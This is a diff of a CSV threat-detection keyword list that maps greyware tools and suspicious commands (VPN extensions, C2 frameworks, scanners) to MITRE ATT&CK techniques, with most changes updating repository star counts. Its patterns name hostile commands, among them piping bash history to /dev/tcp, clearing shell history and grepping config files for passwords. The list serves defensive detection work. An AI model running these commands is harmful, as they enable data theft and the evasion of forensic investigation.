TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*gkojfkhlekighikafcpjkiklfbnlmeio*","greyware_tool_keyword","Hola Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" "*global.rel.tunnels.api.visualstudio.com*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" 
@@ -555,7 +555,7 @@ "*GoodSync Server*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","Service Name","9","10","N/A","N/A","N/A","N/A" "*GoodSync-vsub-2Go-Setup.exe*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","1","portable version","9","10","N/A","N/A","N/A","N/A" "*gpg --list-keys*","greyware_tool_keyword","gpg","List gpg keys for privilege escalation","T1553.002","TA0006","N/A","N/A","Discovery - Privilege Escalation","N/A","1","0","N/A","4","8","N/A","N/A","N/A","N/A" -"*gpg_keys/xmrig.asc*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*gpg_keys/xmrig.asc*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*grep -* *DBPassword*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. 
# search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*grep *password /var/www*","greyware_tool_keyword","grep","search for passwords","T1005 - T1083 - T1213","TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*grep *password.* /etc/*.conf*","greyware_tool_keyword","grep","Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. # search for plain text user/passwords","T1059 - T1046 - T1087.002 - T1078.004","TA0002 - TA0007 - TA0004 - TA0006","N/A","N/A","Privilege escalation","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -571,18 +571,18 @@
 "*higioemojdadgdbhbbbkfbebbdlfjbip*","greyware_tool_keyword","Unlimited VPN & Proxy by ibVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*hipncndjamdcmphkgngojegjblibadbe*","greyware_tool_keyword","RusVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*","greyware_tool_keyword","bash keylogger","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
-"*history -c*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z"
+"*history -c*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
 "*history -d -2 && history -d -1*","greyware_tool_keyword","history","Removes the most recently logged command.","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*hnmpcagpplmpfojmgmnngilcnanddlhb*","greyware_tool_keyword","Windscribe","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*hoapmlpnmpaehilehggglehfdlnoegck*","greyware_tool_keyword","Tunnello VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
-"*http*.sslip.io*","greyware_tool_keyword","sslip.io","sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 127-0-0-1.sslip.io maps to 127.0.0.1","T1568.002 - T1048.003","TA0003 - TA0004","N/A","N/A","C2","https://github.com/cunnie/sslip.io","1","1","letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic","6","10","463","63","2023-10-02T11:53:54Z","2015-08-26T18:43:35Z"
+"*http*.sslip.io*","greyware_tool_keyword","sslip.io","sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 127-0-0-1.sslip.io maps to 127.0.0.1","T1568.002 - T1048.003","TA0003 - TA0004","N/A","N/A","C2","https://github.com/cunnie/sslip.io","1","1","letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic","6","10","464","64","2023-10-04T15:07:26Z","2015-08-26T18:43:35Z"
 "*http*//127.0.0.1:5001*","greyware_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
 "*http*//localhost:5001*","greyware_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z"
 "*http*://127.0.0.1:8081*","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
 "*http*://localhost:8081*","greyware_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
 "*http://127.0.0.1:8000/gate.html*","greyware_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1043 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","1","N/A","10","10","4","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z"
 "*http://127.0.0.1:8081*","greyware_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1043 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","99","32","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z"
-"*http://localhost:7681*","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
+"*http://localhost:7681*","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
 "*https://*.*.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A"
 "*https://*.brs.devtunnels.ms/*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A"
 "*https://*.euw.devtunnels.ms*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","0","1","N/A","8","10","N/A","N/A","N/A","N/A"
@@ -635,26 +635,26 @@
 "*igahhbkcppaollcjeaaoapkijbnphfhb*","greyware_tool_keyword","Social VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*import PyInstaller*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*import SimpleHTTPServer*","greyware_tool_keyword","simplehttpserver","quick web server in python","T1021.002 - T1059.006","TA0002 - TA0005","N/A","N/A","Data Exfiltration","https://docs.python.org/2/library/simplehttpserver.html","1","0","N/A","6","10","N/A","N/A","N/A","N/A"
-"*incorrect signature*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*incorrect signature*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
 "*inligpkjkhbpifecbdjhmdpcfhnlelja*","greyware_tool_keyword","Free One Touch VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*Input line too long.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z"
 "*install pyinstaller*","greyware_tool_keyword","pyinstaller","PyInstaller bundles a Python application and all its dependencies into a single package executable.","T1564.004 - T1027.001 - T1059.006","TA0002 - TA0003 - TA0005","N/A","N/A","Execution","https://www.pyinstaller.org/","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
 "*install snmpcheck*","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*install tshark*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
-"*invalid certificate signing key*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
-"*invalid elliptic curve value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*invalid certificate signing key*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*invalid elliptic curve value*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
 "*Invoke-EnumerateLocalAdmin -Verbose*","greyware_tool_keyword","powershell","Find local admins on the domain machines","T1069.002 - T1087.002 - T1018","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Invoke-UserHunter -CheckAccess*","greyware_tool_keyword","powershell","Check local admin access for the current user where the targets are found","T1078.003 - T1046 - T1087.001","TA0002 - TA0007 - TA0040","N/A","N/A","AD Enumeration","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*Invoke-WebRequest ifconfig.me/ip*Content.Trim()","greyware_tool_keyword","powershell","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
 "*iocnglnmfkgfedpcemdflhkchokkfeii*","greyware_tool_keyword","sVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*iolonopooapdagdemdoaihahlfkncfgg*","greyware_tool_keyword","Azino VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*ip l set dev * address *:*:*","greyware_tool_keyword","ip","changing mac address with ip","T1497.001 - T1036.004 - T1059.001","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","5","10","N/A","N/A","N/A","N/A"
-"*ipscan 1*.255*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*ipscan 10.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*ipscan 172.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*ipscan 192.168.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*ipscan.exe -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
-"*ipscan-win64-*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3517","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*ipscan 1*.255*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*ipscan 10.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*ipscan 172.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*ipscan 192.168.*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*ipscan.exe -*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","0","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
+"*ipscan-win64-*.exe*","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/angryip/ipscan","1","1","N/A","7","10","3518","683","2023-09-11T16:36:25Z","2011-06-28T20:58:48Z"
 "*Ivy_1*_darwin_amd64*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
 "*Ivy_1*_linux_amd64*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
 "*Ivy_1*_windows_amd64.exe*","greyware_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059.005 - T1027 - T1055.005 - T1140","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","726","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
@@ -692,15 +692,15 @@
 "*libwiretap13*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
 "*lklekjodgannjcccdlbicoamibgbdnmi*","greyware_tool_keyword","Anonymous Proxy Vpn Browser","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*llbhddikeonkpbhpncnhialfbpnilcnc*","greyware_tool_keyword","ProxyFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
-"*ln -sf /dev/null *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
+"*ln -sf /dev/null *bash_history*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z"
 "*lneaocagcijjdpkcabeanfpdbmapcjjg*","greyware_tool_keyword","Hub VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
 "*lnfdmdhmfbimhhpaeocncdlhiodoblbd*","greyware_tool_keyword","VPN PROXY MASTER","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
-"*Local: crc32 compensation attack*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*Local: crc32 compensation attack*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
 "*locate password | more*","greyware_tool_keyword","locate","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
